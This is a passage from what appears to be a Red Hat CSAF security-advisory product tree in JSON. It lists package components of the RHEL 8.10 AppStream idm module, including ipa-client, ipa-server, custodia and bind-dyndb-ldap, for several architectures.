"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le"
},
"product_reference": "bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.s390x as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.s390x"
},
"product_reference": "bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64"
},
"product_reference": "bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch"
},
"product_reference": "custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.src as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.src"
},
"product_reference": "custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.src",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-0:4.9.13-9.module+el8.10.0+21691+df63127d.src as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-0:4.9.13-9.module+el8.10.0+21691+df63127d.src"
},
"product_reference": "ipa-0:4.9.13-9.module+el8.10.0+21691+df63127d.src",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64"
},
"product_reference": "ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le"
},
"product_reference": "ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x"
},
"product_reference": "ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64"
},
"product_reference": "ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch"
},
"product_reference": "ipa-client-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64"
},
"product_reference": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le"
},
"product_reference": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x"
},
"product_reference": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64"
},
"product_reference": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64"
},
"product_reference": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le"
},
"product_reference": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x"
},
"product_reference": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64"
},
"product_reference": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64"
},
"product_reference": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le"
},
"product_reference": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x"
},
"product_reference": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64"
},
"product_reference": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch"
},
"product_reference": "ipa-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64"
},
"product_reference": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le"
},
"product_reference": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x"
},
"product_reference": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64"
},
"product_reference": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64"
},
"product_reference": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le"
},
"product_reference": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x"
},
"product_reference": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64"
},
"product_reference": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.noarch as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.noarch"
},
"product_reference": "ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.src as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.src"
},
"product_reference": "ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.src",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19634+c162f948.noarch as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19634+c162f948.noarch"
},
"product_reference": "ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19634+c162f948.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-python-compat-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-python-compat-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch"
},
"product_reference": "ipa-python-compat-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-selinux-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-selinux-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch"
},
"product_reference": "ipa-selinux-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64"
},
"product_reference": "ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le"
},
"product_reference": "ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x"
},
"product_reference": "ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64"
},
"product_reference": "ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch"
},
"product_reference": "ipa-server-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64"
},
"product_reference": "ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le"
},
"product_reference": "ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x"
},
"product_reference": "ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64"
},
"product_reference": "ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-dns-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-dns-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch"
},
"product_reference": "ipa-server-dns-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
